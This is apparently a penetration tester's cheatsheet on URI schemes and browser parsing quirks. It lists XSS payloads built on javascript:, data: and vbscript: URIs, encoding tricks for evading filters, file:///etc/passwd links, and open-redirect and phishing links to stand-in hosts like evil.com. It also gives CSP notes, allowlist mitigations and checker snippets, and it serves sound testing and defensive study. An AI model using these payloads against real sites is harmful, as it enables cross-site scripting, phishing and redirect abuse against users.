📑 URI Schemes & Quirks Cheatsheet (for VAPT)

This cheatsheet summarizes URI schemes, their quirks, encoding tricks, and abuse potential.
Useful for a VAPT engineer’s quick recall.

1. Common Dangerous URI Schemes

| Scheme | Example | Quirks / Abuse Potential |
|---|---|---|
| `javascript:` | `<a href="javascript:alert(1)">` | Executes inline JS when clicked. Filter evasion via case-mixing (`JaVaScRiPt:`), leading whitespace or embedded tabs/newlines (`java&#9;script:`), or HTML entity encoding (`&#106;avascript:`). |
| `data:` | `<iframe src="data:text/html,<script>alert(1)</script>">` | Embeds inline resources (HTML, SVG, CSS, JS, images). Can bypass CSP if `data:` is allowed. Variants: `data:image/svg+xml;base64,...`, `data:text/html;base64,...`. |
| `vbscript:` | `<a href="vbscript:msgbox(1)">` | IE-only legacy scheme. Mostly dead, but still relevant in old apps. |
| `file:` | `<a href="file:///etc/passwd">` | Local file inclusion / leaks in some misconfigured apps. |

2. Lesser-Known URI Schemes (Potential Attack Surface)

| Scheme | Example | Notes |
|---|---|---|
| `mailto:` | `<a href="mailto:[email protected]?subject=Hi&body=<script>alert(1)</script>">` | Sometimes vulnerable in mail clients (header injection). |
| `tel:` | `<a href="tel:123456789">` | Not dangerous alone, but useful in phishing. |
| `sms:` | `<a href="sms:12345?body=Click%20this%20link">` | Can prefill malicious SMS content. |
| `mhtml:` | `<iframe src="mhtml:http://evil.com/file.mht!x-usc:http://victim.com">` | Legacy IE/Edge quirk: can reference external and internal resources. |
| `blob:` | `<iframe src="blob:https://victim.com/uuid">` | Often used to bypass CSP. Content generated via `URL.createObjectURL()`. |
| `filesystem:` | `filesystem:https://victim.com/temporary/evil.html` | Similar to `blob:`, rarely seen now. |

3. OS / Application Launcher URI Schemes (Deep Links)

| Scheme | Example | Effect |
|---|---|---|
| `ms-office:` | `ms-word:ofe\|u\|<url>` | Opens the document at `<url>` in Word for editing (`ofe`). |
| `ms-excel:` | `ms-excel:ofe\|u\|<url>` | Opens the workbook at `<url>` in Excel for editing (`ofe`). |
| `ms-access:` | `ms-access:ofv\|u\|<url>` | Opens the file at `<url>` in Access for viewing (`ofv`). |
| `skype:` | `skype:echo123?call` | Launches Skype and makes a call. |
| `zoommtg:` | `zoommtg://zoom.us/join?action=join&confno=123456` | Launches Zoom client. |
| `slack:` | `slack://open?team=T123&id=C123` | Opens Slack app. |
| `whatsapp:` | `whatsapp://send?text=Hello` | Opens WhatsApp with prefilled text. |
| `tg:` | `tg://resolve?domain=someuser` | Opens Telegram app. |
| `steam:` | `steam://run/730` | Launches a Steam game. |
| `itms-services:` | `itms-services://?action=download-manifest&url=https://evil.com/app.plist` | iOS enterprise app install (phishing vector). |
| `market:` | `market://details?id=com.evil.app` | Opens Google Play Store. |
| `intent:` (Android) | `intent://scan/#Intent;scheme=http;package=com.evil.app;end` | Android deep links to apps. |

4. Browser-Supported URI Encoding / Obfuscation Techniques

Different browsers parse URIs leniently → allowing attacker-friendly quirks.

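| Technique | Example | Browser Support / Notes |
|---|---|---|
| Case variations | `JaVaScRiPt:alert(1)` | Schemes are case-insensitive; all modern browsers accept mixed case. |
| Extra whitespace | ` javascript:alert(1)` (leading space) | Leading and trailing spaces and C0 control characters are stripped before parsing. A space between the scheme and `:` (`javascript :`) is not stripped; the value is then treated as a relative URL and does not execute. |
| Tab / newline injection | `java&#9;script:alert(1)`, `java&#10;script:alert(1)` | Tab, LF, and CR are removed anywhere in the URL by WHATWG-style parsers, so the scheme still resolves to `javascript:`. A literal `\n` typed into an attribute is not a newline. |
| HTML entities (decimal/hex) | `&#106;avascript:alert(1)` (`&#106;` = `j`) | All browsers decode HTML entities inside attributes (`href`, `src`). |
| Percent encoding (URL encoding) | `javascript:%61lert(1)` (`%61` = `a`) | The body of a `javascript:` URL is percent-decoded once before execution. Percent-encoding inside the scheme itself is not decoded. |
| Double encoding | `javascript:%2561lert(1)` | Browsers decode only once (`%2561` becomes `%61`). Works only when another layer (server, framework, filter) decodes the value first. |
| JavaScript Unicode escape | `javascript:\u0061lert(1)` | Decoded by the JavaScript engine, so it works in the code portion of an `href` as well as in inline script. It does not work in the scheme. |
| CSS-style escape | `javascript:\0061lert(1)` | Parsed in CSS contexts, not in URIs; useful inside `<style>@import url()</style>`. |
| Homoglyph attacks (Unicode lookalikes) | `javаscript:` (Cyrillic `а`) | Scheme characters must be ASCII, so this does not execute as `javascript:`. Homoglyphs matter mainly for visually spoofed hostnames. |
| Protocol-relative URLs | `<a href="//evil.com">` | Loads `https://evil.com` if parent page is HTTPS. |
| Userinfo `@` trick | `http://victim.com@evil.com` | Host is `evil.com`; `victim.com` is parsed as userinfo and ignored. Works in Chrome, FF, Safari. |
| Embedded nulls (%00) | `http://evil.com%00.victim.com` | Some old parsers split incorrectly. Mostly fixed. |
| Non-printable chars | `javascript:alert(1)` with a `U+200B` zero-width space inserted | `U+200B` is not stripped by the URL parser and is not a valid scheme character, so the result depends on where it is placed and on any filter-side normalization. Verify per browser. |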
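
The parsing quirks in this table can be checked without a browser. The following is a minimal sketch, assuming Node.js, whose built-in `URL` class follows the WHATWG URL Standard. The helper name `effectiveScheme` and the base URL `https://site.example/` are hypothetical, chosen only for illustration. It reports the scheme an already entity-decoded attribute value ends up with.

```javascript
// Sketch: report which scheme a WHATWG-style parser assigns to an href.
// `effectiveScheme` and the default base URL are illustrative assumptions.
function effectiveScheme(href, base = "https://site.example/") {
  try {
    return new URL(href, base).protocol; // lowercase, includes the trailing ":"
  } catch {
    return null; // the parser rejected the input outright
  }
}

const samples = [
  "JaVaScRiPt:alert(1)",   // mixed case
  "  javascript:alert(1)", // leading spaces
  "java\tscript:alert(1)", // embedded tab
  "java\nscript:alert(1)", // embedded newline
  "javascript :alert(1)",  // space before the colon
  "javascript%3Aalert(1)", // percent-encoded colon
];

for (const href of samples) {
  console.log(JSON.stringify(href), "->", effectiveScheme(href));
}
```

In this sketch the first four samples resolve to `javascript:`, while the last two are treated as relative paths and inherit the base scheme. A filter that compares raw strings instead of the parsed scheme would miss the first group.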

5. `data:` URI Payload Examples

| Payload | Effect |
|---|---|
| `data:text/html,<script>alert(1)</script>` | Executes inline HTML/JS. |
| `data:image/svg+xml,<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)">` | SVG-based XSS. |
| `data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==` | Same, but base64-encoded. |
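
When triaging payloads like these, it helps to see what a `data:` URI actually carries. Below is a small sketch, assuming Node.js (it uses the Node-specific `Buffer` global). The function name `decodeDataUri` is hypothetical, and the parsing is deliberately simplified: it splits on the first comma and only recognizes a trailing `;base64` flag.

```javascript
// Sketch: split a data: URI into media type and decoded body.
// Simplified on purpose; not a full RFC 2397 parser.
function decodeDataUri(uri) {
  const match = /^data:([^,]*),(.*)$/is.exec(uri.trim());
  if (!match) return null; // not a data: URI

  const [, meta, payload] = match;
  const isBase64 = /;\s*base64\s*$/i.test(meta);
  // RFC 2397 default when no media type is given.
  const mediaType =
    meta.replace(/;\s*base64\s*$/i, "") || "text/plain;charset=US-ASCII";

  const body = isBase64
    ? Buffer.from(payload, "base64").toString("utf8") // Node.js only
    : decodeURIComponent(payload); // throws on malformed % sequences

  return { mediaType, body };
}

console.log(
  decodeDataUri("data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
);
console.log(decodeDataUri("data:text/html,%3Cscript%3Ealert(1)%3C/script%3E"));
```

Both calls yield the same body, `<script>alert(1)</script>`, which is why a filter that only looks for a literal `<script>` in the attribute misses the encoded variants.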

6. CSP (Content Security Policy) Relevance

- If `script-src 'self' data:` is set, `data:` URIs can still inject JS.
- If `script-src 'unsafe-inline'` is set, `javascript:` and entity-encoded URIs may slip through.
- `blob:` and `filesystem:` are often overlooked in CSP configs.
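
A quick way to spot these entries during a review is to parse the policy string and list the script sources that re-open the vectors above. This is a rough sketch in plain JavaScript; the function name `riskyScriptSources` is hypothetical, and it does not model nonces, hashes, or `'strict-dynamic'`, which change how `'unsafe-inline'` is treated.

```javascript
// Sketch: list script sources in a CSP that allow the schemes discussed here.
function riskyScriptSources(policy) {
  const directives = new Map();
  for (const part of policy.split(";")) {
    const [name, ...values] = part.trim().split(/\s+/);
    const key = name.toLowerCase();
    // Per CSP, only the first occurrence of a directive is used.
    if (key && !directives.has(key)) directives.set(key, values);
  }

  // script-src falls back to default-src when it is absent.
  const sources =
    directives.get("script-src") ?? directives.get("default-src") ?? [];
  const risky = new Set(["data:", "blob:", "filesystem:", "'unsafe-inline'"]);
  return sources.filter((source) => risky.has(source.toLowerCase()));
}

console.log(riskyScriptSources("default-src 'self'; script-src 'self' data: blob:"));
console.log(riskyScriptSources("default-src 'self' 'unsafe-inline'"));
console.log(riskyScriptSources("script-src 'self'"));
```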

7. Open Redirect Tricks with URI Schemes

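- `<a href="//evil.com">` → loads external site.
- `<a href="////evil.com">` → extra slashes are ignored; resolves to `evil.com`.
- `<a href="http:@evil.com">` → resolves to `http://evil.com` from an HTTPS page; on an HTTP page it is treated as a relative path.
- `<a href="http://victim.com@evil.com">` → phishing trick (`victim.com` is only userinfo).
- `<a href="ms-word:ofe|u|http://evil.com/file.docx">` → auto-launch apps.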
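
Redirect targets like these are easiest to judge after parsing, not by string matching. The sketch below assumes Node.js and its WHATWG-compliant `URL` class. `leavesSite` is a hypothetical helper, and `https://victim.com/app/` stands in for the page that contains the link.

```javascript
// Sketch: does a redirect target leave the current site (or the web entirely)?
function leavesSite(href, pageUrl) {
  const page = new URL(pageUrl);
  let target;
  try {
    target = new URL(href, page);
  } catch {
    return true; // unparseable input is treated as unsafe
  }
  // Anything that is not http(s) hands control to another handler or app.
  if (target.protocol !== "http:" && target.protocol !== "https:") return true;
  return target.host !== page.host;
}

const page = "https://victim.com/app/";
const candidates = [
  "/account",
  "//evil.com",
  "////evil.com",
  "/\\evil.com", // backslash is treated like a slash for http(s)
  "http:@evil.com",
  "http://victim.com@evil.com",
  "ms-word:ofe|u|http://evil.com/file.docx",
];

for (const href of candidates) {
  console.log(href, "->", leavesSite(href, page));
}
```

Only `/account` stays on the site in this run. A check such as "starts with `/`" or "contains `victim.com`" would accept several of the others.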

✅ Key Takeaways for VAPT

Browsers are lenient parsers: case-insensitivity, whitespace, and encodings expand attack surface.
javascript:, data:, vbscript: remain classic vectors.
Obfuscation via percent encoding, HTML entities, homoglyphs, and protocol-relative URLs bypasses many weak filters.
A CSP should not list data:, blob:, or filesystem: as allowed sources unless they are genuinely needed; each one is a potential bypass route.
OS / App launch URIs are often forgotten in open redirect testing.

URI Scheme Quirks Cheatsheet

This document collects quirks and odd behaviors in URI scheme handling across browsers, useful for VAPT engineers.

1. `javascript:` URI Decoding

<a href="javascript:alert(%27123%27)">Click</a>

%27 is URL-encoded '.
Browser decodes before execution, so the JS engine sees:
```
alert('123');
```
Unlike http(s): URLs, the body of a javascript: URL is percent-decoded by the browser before it is handed to the JavaScript engine.

Obfuscation Tricks

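Double encoding:

<a href="javascript:alert(%25271%2527)">Click</a>

→ %2527 → %27 → '

The browser performs only the last decoding step. The chain completes only when another layer (server, proxy, or filter) decodes the value once before it reaches the page; otherwise the engine receives alert(%271%27), which is a syntax error.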

Mixed case & Unicode homoglyphs sometimes bypass filters.
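
The single decoding pass can be reproduced outside a browser. This is a minimal sketch, assuming Node.js. `javascriptUrlBody` is a hypothetical helper that approximates what the HTML Standard describes for `javascript:` navigation: strip the scheme from the serialized URL, then percent-decode once. It uses `decodeURIComponent`, which throws on malformed `%` sequences where a browser would pass them through.

```javascript
// Sketch: what source text would the JS engine receive for a javascript: URL?
function javascriptUrlBody(href) {
  const url = new URL(href);
  if (url.protocol !== "javascript:") return null;
  const encoded = url.href.slice("javascript:".length);
  return decodeURIComponent(encoded); // exactly one decoding pass
}

console.log(javascriptUrlBody("javascript:alert(%27123%27)"));   // single-encoded
console.log(javascriptUrlBody("javascript:alert(%25271%2527)")); // double-encoded
```

The first call returns `alert('123')`. The second returns `alert(%271%27)`, which is not valid JavaScript, so a double-encoded payload needs an extra decode somewhere upstream to become executable.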

2. `http(s):` URI No Decoding

<a href="https://example.com?%27">Click</a>

%27 remains literal in the outgoing request:
```
https://example.com/?%27
```
Server decides whether to decode into '.
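
A short sketch of the same point, assuming Node.js: the serialized URL keeps `%27` as written, and decoding only happens when something (here `URLSearchParams`, standing in for a server-side framework) chooses to do it. The helper name `describeQuery` is hypothetical.

```javascript
// Sketch: what goes on the wire versus what a decoding consumer sees.
function describeQuery(href) {
  const url = new URL(href);
  return {
    onTheWire: url.href, // percent-encoding preserved
    decodedKeys: [...url.searchParams.keys()], // decoded on request
  };
}

console.log(describeQuery("https://example.com?%27"));
```

Here `onTheWire` is `https://example.com/?%27`, while `decodedKeys` contains a single `'` character.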

3. `data:` URI Execution

<a href="data:text/html,<script>alert(1)</script>">Click</a>

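The browser renders the inline HTML and runs its script.
Current Chrome and Firefox block top-level navigation to data: URLs from a link click, so this payload is mostly useful in frames (<iframe src>) and other embedding contexts.
Common for stored XSS payloads and bypasses.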

Can be obfuscated with encoding:

data:text/html,%3Cscript%3Ealert(1)%3C/script%3E

Double encoding works only where another layer decodes the value once before the browser sees it.

4. `vbscript:` (legacy IE-only)

<a href="vbscript:MsgBox(1)">Click</a>

Supported only in old IE.
Deprecated, but may exist in legacy environments.

5. `file:` Scheme

<a href="file:///etc/passwd">Click</a>

Accesses local files.
Modern browsers do not let pages served over HTTP/HTTPS navigate to or load file: URLs.
Sometimes abused via local file inclusion (LFI) vectors in apps.

6. Mixed Scheme Behavior

javascript: in <iframe src>:
```
<iframe src="javascript:alert(1)"></iframe>
```
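Executes in the frame's own window, not the parent's, but the frame inherits the embedding page's origin, so the script can still reach the parent document.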
data: in <iframe>:
```
<iframe src="data:text/html,<script>alert(1)</script>"></iframe>
```
Executes in a separate document with an opaque origin (serialized as null), so it cannot read the embedding page.

7. URL Fragments

<a href="https://example.com/#javascript:alert(1)">Click</a>

Fragment identifiers (#...) are not sent to the server.
Some DOM sinks (location.hash) may re-trigger decoding/execution if used unsafely.
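
To make the split concrete, here is a small sketch assuming Node.js. `splitRequestAndFragment` is a hypothetical helper that separates the part of a URL that reaches the server from the part that stays in the browser.

```javascript
// Sketch: the fragment never appears in the request the server receives.
function splitRequestAndFragment(href) {
  const url = new URL(href);
  return {
    sentToServer: url.origin + url.pathname + url.search,
    fragment: url.hash, // only visible to client-side code (location.hash)
  };
}

console.log(splitRequestAndFragment("https://example.com/#javascript:alert(1)"));
```

Server-side logs and filters therefore never see `javascript:alert(1)` here; only client-side code that reads the fragment does.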

8. Advanced Obfuscation Examples

Hex encoding in javascript:

<a href="javascript:%61lert(1)">Click</a>

%61 → a

Unicode escapes

<a href="javascript:\u0061lert(1)">Click</a>

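Comment injection

<a href="javascript:alert/**/(1)">Click</a>

A comment acts as whitespace between tokens, so it cannot split an identifier: al/**/ert(1) is a syntax error.

Hex + octal string escapes

<a href="javascript:window['\x61\154ert'](1)">Click</a>

\x61 → a and \154 → l. These escapes are valid only inside string literals, so the function name has to be looked up as a string; \x61\141lert(1) as bare code is a syntax error.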
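
Which of these JavaScript-level tricks actually parse can be checked with a stubbed `alert`. The sketch below assumes Node.js. `tryPayload` is a hypothetical helper that compiles the already percent-decoded body with the `Function` constructor (non-strict code, like a `javascript:` URL body) and passes in a fake `alert` and `window`. It runs the payload, so use it only on strings you wrote yourself.

```javascript
// Sketch: does a javascript: URL body parse and reach alert()?
function tryPayload(source) {
  const calls = [];
  const alert = (value) => calls.push(value); // stub that records its argument
  try {
    new Function("alert", "window", source)(alert, { alert });
    return calls; // arguments alert() was called with
  } catch (error) {
    return error.name; // e.g. "SyntaxError"
  }
}

const payloads = [
  "\\u0061lert(1)",             // Unicode escape in an identifier
  "alert/**/(1)",               // comment between tokens
  "al/**/ert(1)",               // comment inside an identifier
  "window['\\x61\\154ert'](1)", // hex + octal escapes inside a string
  "\\x61\\141lert(1)",          // string escapes used as bare code
];

for (const body of payloads) {
  console.log(body, "->", tryPayload(body));
}
```

In this run the first, second, and fourth payloads call `alert(1)`; the third and fifth fail with `SyntaxError`.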

✅ Summary for VAPT

javascript:: decoded & executed, multiple obfuscation paths.
http(s):: encoding preserved until server-side.
data:: inline execution possible, encoding tricks apply.
file:: local file risks.
vbscript:: legacy, still important for old IE.
Fragments & iframe contexts add extra complexity.

HTML Encoding Quirks

Note

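Percent-decoding of a javascript: URL body happens only when the browser navigates to that URL, for example when a user clicks an anchor. An event-handler attribute such as onerror holds script, not a URL, so a leading javascript: is parsed as a statement label and nothing is percent-decoded.

<img src=X onerror="javascript:fetch('https://example.com?%3e')" >

Here %3e is not decoded; the string is passed to fetch() exactly as written.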

Case 1: Direct JavaScript URI

<a href="javascript:alert(1)">Click me</a>

Clicking executes alert(1) since the javascript: scheme is interpreted directly.

Case 2: Encoded Colon

<a href="javascript&#x3A;alert(1)">Click me</a>

`&#x3A;` is the HTML entity for `:`.
Browsers decode HTML entities inside attributes before interpreting them.

This becomes:

<a href="javascript:alert(1)">Click me</a>

Still executable.

Case 3: Partially Encoded Keyword

<a href="javasc&#114;ipt:alert(1)">Click me</a>

`&#114;` = `r`.
After decoding, the browser sees javascript:alert(1).
Still executes.

Why?

HTML entity decoding happens during parse time.
Then the URI scheme (javascript:) is recognized and executed.
The source of the characters (literal vs entity) doesn’t matter.

Security Implications

Encoding characters inside attributes does not neutralize dangerous JavaScript URIs.
HTML encoding is not a sufficient defense against XSS in href.
Correct mitigations:
- Blocklist/strip dangerous URI schemes (javascript:, data:, vbscript:).
- Prefer an allowlist (only http://, https://, mailto:).
- Use a security-focused HTML sanitizer.
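
An allowlist check is most reliable when it runs on the parsed scheme, not on the raw string. The following is a minimal sketch, assuming Node.js and its WHATWG-compliant `URL` class. `isAllowedHref`, `ALLOWED_SCHEMES`, and the base URL are hypothetical names, and the input is assumed to be the attribute value after HTML entity decoding (for example, as read from the DOM).

```javascript
// Sketch: allowlist validation on the parsed scheme.
const ALLOWED_SCHEMES = new Set(["http:", "https:", "mailto:"]);

function isAllowedHref(href, base = "https://site.example/") {
  try {
    // Relative references inherit the base scheme, so they pass as http(s).
    return ALLOWED_SCHEMES.has(new URL(href, base).protocol);
  } catch {
    return false; // reject anything the parser cannot handle
  }
}

const inputs = [
  "/profile",
  "mailto:someone@example.com",
  "javascript:alert(1)",
  "JaVaScRiPt:alert(1)",
  "java\tscript:alert(1)",
  "data:text/html,<script>alert(1)</script>",
  "vbscript:MsgBox(1)",
];

for (const href of inputs) {
  console.log(JSON.stringify(href), "->", isAllowedHref(href));
}
```

Only the first two inputs pass. This covers the scheme check alone; it does not replace an HTML sanitizer or host validation.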

✅ Key Takeaway

If you add HTML encoding inside href with a JavaScript URI, the browser decodes it back before execution. ➡️ It still works and remains equally dangerous.

Javascript URI Encoding Quirks

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Javascript URI encoding - Quirks</title>
</head>
<body>
   <a href="javascript:alert(1)">Click me</a>
   <hr>
   <a href="javascript:alert%28&#x27;1&apos;)">Click Me - URL Encoding + HTML Encoding</a>  <!-- This works because HTML entities are handled by html parser and URL encoding is decoded before sending to javascript engine -->
   <hr>
   <a href="javascript&#x3A;alert(1)">Click me - HTML Encoding</a> <!-- This works because of the HTML entity encoding which gets parsed by HTML parser -->
   <hr>
   <a href="javascript%3Aalert(1)">Click me - URL Encoding of URI scheme separator (colon) </a> <!-- This won't work because percent-encoding is not decoded in the scheme or its colon separator; it only applies after the scheme -->
   <hr>
   <a href="\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074:alert(1)">Click me - Unicode Encoding of javascript scheme</a> <!-- This won't work because only the JavaScript engine understands \u escapes; the HTML and URL parsers treat them literally -->
   <hr>
   <a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">Click me - Unicode encoding of javascript code</a> <!-- This works because unicode encoding supported by javascript-->
</body>
</html>

Case 1: Direct JavaScript URI

<a href="javascript:alert(1)">Click me</a>

Clicking executes alert(1) since the javascript: scheme is interpreted directly.

Case 2: Encoded Colon (HTML Entity)

<a href="javascript&#x3A;alert(1)">Click me</a>

`&#x3A;` is the HTML entity for `:`.
Browsers decode HTML entities inside attributes before interpreting them.

This becomes:

<a href="javascript:alert(1)">Click me</a>

Still executable.

Case 3: Partially Encoded Keyword (HTML Entity)

<a href="javasc&#114;ipt:alert(1)">Click me</a>

`&#114;` = `r`.
After decoding, the browser sees javascript:alert(1).
Still executes.

Case 4: URL Encoding of Code

<a href="javascript:alert%28&#x27;1&apos;)">Click me</a>

`%28` is the URL encoding for `(`, and `&#x27;` / `&apos;` are HTML entity encodings for `'`.
The HTML parser decodes entities first, then the browser percent-decodes the URL body before handing it to the JavaScript engine.
✅ This works because both decoding steps occur before execution.

Case 5: URL Encoding of Scheme Separator

<a href="javascript%3Aalert(1)">Click me</a>

%3A is URL encoding for :.
Browsers generally do not decode percent-encoding in the URI scheme before recognizing it.
Treated as literal string javascript%3Aalert(1).
❌ Does not execute.

Case 6: Mixed Encodings

<a href="javasc%72ipt&#x3A;alert(1)">Click me</a>

`%72` is the URL encoding for `r`, and `&#x3A;` is the HTML entity for `:`.
HTML entities are decoded, but `%` is not a valid scheme character and percent-encoding is never decoded inside the scheme.
Result: javasc%72ipt:alert(1) is treated as a relative URL → ❌ Non-executable.

Case 7: Unicode Escape in Scheme

<a href="\u006a\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074:alert(1)">Click me</a>

These are JavaScript string escapes, not HTML or URL encodings.
Inside an HTML attribute, they are not decoded by the parser.
Treated literally → ❌ Non-executable.

Case 8: Unicode Escape in JavaScript Code

<a href="javascript:\u0061\u006C\u0065\u0072\u0074(1)">Click me</a>

Here the scheme is valid (javascript:), and the code uses Unicode escapes.
The JavaScript engine decodes the Unicode escapes into alert.
✅ Executable.

Why?

HTML entity decoding happens at parse time.
URL encoding (%xx) is decoded only in the body of a javascript: URL, just before execution; in the scheme part it is never decoded, so the scheme is not recognized.
Unicode escapes are ignored by the HTML parser but are handled by the JavaScript engine if inside valid JS code.
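
The three layers above can be sketched as a pipeline and run against Cases 1 to 8. This assumes Node.js. `decodeEntities` and `analyzeHref` are hypothetical helpers: the entity decoder handles only numeric references and a handful of named ones, and `decodeURIComponent` stands in for the browser's percent-decoding (it throws on malformed `%` sequences).

```javascript
const NAMED = new Map([
  ["amp", "&"], ["lt", "<"], ["gt", ">"],
  ["quot", '"'], ["apos", "'"], ["colon", ":"],
]);

// Step 1: what the HTML parser does to an attribute value (simplified).
function decodeEntities(value) {
  const pattern = /&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));/gi;
  return value.replace(pattern, (whole, hex, dec, name) => {
    if (name !== undefined) return NAMED.get(name) ?? whole;
    const codePoint = parseInt(hex ?? dec, hex !== undefined ? 16 : 10);
    return codePoint <= 0x10ffff ? String.fromCodePoint(codePoint) : whole;
  });
}

// Steps 2 and 3: URL parsing, then one percent-decode of a javascript: body.
function analyzeHref(attributeValue, base = "https://site.example/") {
  const href = decodeEntities(attributeValue);
  const url = new URL(href, base);
  if (url.protocol !== "javascript:") {
    return { executes: false, resolved: url.href };
  }
  const script = decodeURIComponent(url.href.slice("javascript:".length));
  return { executes: true, script }; // the JS engine handles \u escapes itself
}

const cases = [
  "javascript:alert(1)",
  "javascript&#x3A;alert(1)",
  "javasc&#114;ipt:alert(1)",
  "javascript:alert%28&#x27;1&apos;)",
  "javascript%3Aalert(1)",
  "javasc%72ipt&#x3A;alert(1)",
  "\\u006a\\u0061\\u0076\\u0061\\u0073\\u0063\\u0072\\u0069\\u0070\\u0074:alert(1)",
  "javascript:\\u0061\\u006C\\u0065\\u0072\\u0074(1)",
];

cases.forEach((value, index) => {
  console.log(`Case ${index + 1}:`, analyzeHref(value));
});
```

Cases 1 to 4 and 8 come out as executable, while 5 to 7 resolve to ordinary relative URLs on the base host, matching the ✅/❌ marks above.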

Security Implications

HTML entity encoding does not protect against JavaScript URIs.
URL encoding can sometimes prevent execution (scheme obfuscation), but can still work in code portions.
Unicode escapes can be used to bypass naive filters inside JS code.
Correct mitigations:
- Blocklist/strip dangerous URI schemes (javascript:, data:, vbscript:).
- Use an allowlist (http://, https://, mailto: only).
- Apply a security-focused HTML sanitizer.

✅ Key Takeaway

HTML entities inside href are decoded → still dangerous.
URL encoding may break execution in schemes but can work inside code → inconsistent.
Unicode escapes in the scheme don’t work, but inside JavaScript code they do.
Always validate and sanitize URIs instead of relying on encoding quirks.

URLs without scheme (e.g. `//example.com`) — quick cheatsheet

What it is

//example.com/path is a protocol-relative (scheme-relative) or network-path reference per RFC 3986.
Browsers resolve it by using the current page's scheme:
- Page https://site → //example.com → https://example.com
- Page http://site → //example.com → http://example.com
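
The same resolution can be reproduced with the WHATWG `URL` class. A minimal sketch, assuming Node.js; `resolve` is a hypothetical helper and the `site.example` pages are placeholders.

```javascript
// Sketch: a scheme-relative reference inherits the scheme of the page.
function resolve(reference, pageUrl) {
  return new URL(reference, pageUrl).href;
}

console.log(resolve("//example.com/path", "https://site.example/page"));
console.log(resolve("//example.com/path", "http://site.example/page"));
```

The first call yields `https://example.com/path`, the second `http://example.com/path`.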

Where you see it (HTML / CSS attributes)

Common attributes/tags that accept these:

<img src="//cdn.example.com/p.png">
<script src="//cdn.example.com/lib.js"></script>
<link href="//fonts.example.com/style.css">
<iframe src="//example.com"></iframe>
<a href="//example.com"> (behaves like absolute URL w/o scheme)
<source srcset="//...">, <video src="//...">, <audio src="//...">
CSS: background-image: url("//images.example.com/bg.png");

Also applies to srcset entries and @import in CSS.

Related URL forms (for comparison)

Absolute with scheme: https://example.com/foo — explicit scheme.
Protocol-relative / scheme-relative: //example.com/foo — inherits document scheme.
Root-relative: /foo/bar — same origin, absolute path on current host.
Path-relative: images/p.png or ./p.png — relative to current document path.
Query/Hash only: ?q=1 or #anchor — same document, modifies query/hash.
Data URI: data:text/html,... — inline resource.
Scheme-only / custom: mailto:, tel:, file:, javascript: — special handling by user agent.
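
For quick triage of user-supplied values, the forms above can be told apart by their prefix. This is a rough sketch in plain JavaScript; `classifyReference` is a hypothetical helper that looks only at the raw string. It does not account for whitespace stripping or backslash handling, so parsed results should take precedence where they disagree.

```javascript
// Sketch: classify a URL reference by its leading characters.
function classifyReference(reference) {
  if (/^[a-z][a-z0-9+.-]*:/i.test(reference)) return "absolute (has scheme)";
  if (reference.startsWith("//")) return "scheme-relative";
  if (reference.startsWith("/")) return "root-relative";
  if (reference.startsWith("?")) return "query-only";
  if (reference.startsWith("#")) return "fragment-only";
  return "path-relative";
}

const references = [
  "https://example.com/foo",
  "//example.com/foo",
  "/foo/bar",
  "images/p.png",
  "?q=1",
  "#anchor",
  "mailto:someone@example.com",
];

for (const reference of references) {
  console.log(reference, "->", classifyReference(reference));
}
```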

Edge cases & parsing notes

//user:pass@host:8080/path — credentials can appear, but modern browsers may ignore credentials in cross-origin contexts or warn.
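Browsers treat a leading // as the start of an authority (host), not as literal slashes, so everything up to the next / is read as the host.
Leading and trailing whitespace in the attribute value is stripped, and tabs and newlines are removed anywhere in the URL, so " //evil.com" or "/<tab>/evil.com" still resolve to evil.com. On http(s) pages a backslash is treated as a slash, so /\evil.com behaves the same way.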

Security & operational implications (VAPT checklist)

Mixed content behavior: // will become http:// on an http page — risk for downgrade if the page is loaded over HTTP. On HTTPS pages it becomes https:// (safe if the resource supports TLS).
CSP matching: CSP sources like https: match resources loaded via // when resolved to https. // does not bypass CSP — CSP evaluates the resolved URL against policies.
Resource reuse / cache: Same resource URL but loaded over different schemes may be treated differently by caches/Browsers.
Host header / SSRF: If user-controlled, //attacker.com may be used to cause requests to attacker domains (useful for exfil / tracking). Validate/whitelist hosts.
Protocol-relative with file: or other schemes: If the document is served from a non-HTTP scheme (e.g., file:), // is resolved relative to that context — rarely used but can produce odd behavior.
Open redirect / link confusion: <a href="//evil.com"> will navigate away from site — ensure user input isn't allowed to inject such links.
Mixed-origin assumptions: Root-relative and protocol-relative URLs are different. //example.com is cross-origin if host ≠ current host; /path stays same origin.
Phishing & UX: //example.com displayed without scheme in some UIs may look like a relative link; visually ambiguous.

Practical test cases

On an HTTPS page, test <img src="//attacker.test/track"> → should fetch over HTTPS.
On an HTTP page, test same link → fetch over HTTP (downgrade).
Inject //attacker.example into attributes that accept URLs and see whether filters/blocklists strip schemes or only check for http(s).
Test CSP: add Content-Security-Policy: default-src 'self' https: and try //evil vs http://evil vs https://evil.
Check srcset parsing with // entries (complex parser paths — some filters miss them).

Quick examples

<!-- protocol-relative -->
<script src="//cdn.example.com/lib.js"></script>

<!-- root-relative (same host) -->
<link href="/assets/style.css" rel="stylesheet">

<!-- path-relative -->
<img src="images/pic.png">

<!-- absolute with scheme -->
<img src="https://images.example.com/pic.png">

<!-- data URI (inline) -->
<iframe src="data:text/html;base64,PGgxPkhlbGxvPC9oMT4="></iframe>

Short recommendations

Prefer explicit HTTPS (https://...) for external resources, both to avoid downgrade and for clarity.
Validate/whitelist hostnames if users can supply URLs.
Normalize and canonicalize URLs server-side before storing or using them.
Use a CSP that restricts origins (frame-src, img-src, script-src, etc.) instead of relying on scheme-relative behavior.

aravindkumarsvg/uri_schemes-quirks.md
